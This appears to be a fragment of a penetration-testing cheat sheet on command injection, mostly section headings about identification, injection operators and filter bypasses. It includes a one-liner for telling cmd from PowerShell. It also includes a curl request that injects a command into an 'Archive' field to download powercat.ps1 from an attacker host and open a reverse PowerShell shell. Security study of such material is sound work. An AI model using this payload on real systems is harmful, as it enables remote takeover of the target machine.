Command Injection
1) Identification
(dir 2>&1 *`|echo CMD);&<# rem #>echo PowerShellcurl -X POST --data 'Archive=git%3BIEX%20(New-Object%20System.Net.Webclient).DownloadString(%22http%3A%2F%2F<ATTACKER_IP>%2Fpowercat.ps1%22)%3Bpowercat%20-c%20<ATTACKER_IP>%20-p%20<PORT>%20-e%20powershell' http://<TARGET>:<PORT>/archive2) Command Methods
Injection Operator
Injection Character
URL-Encoded Character
Executed Command
3) Bypassing Filters
Space is blacklisted
/ or \ are blacklisted
Commands are blacklisted
4) Reverse commands
5) Encoded commands
Last updated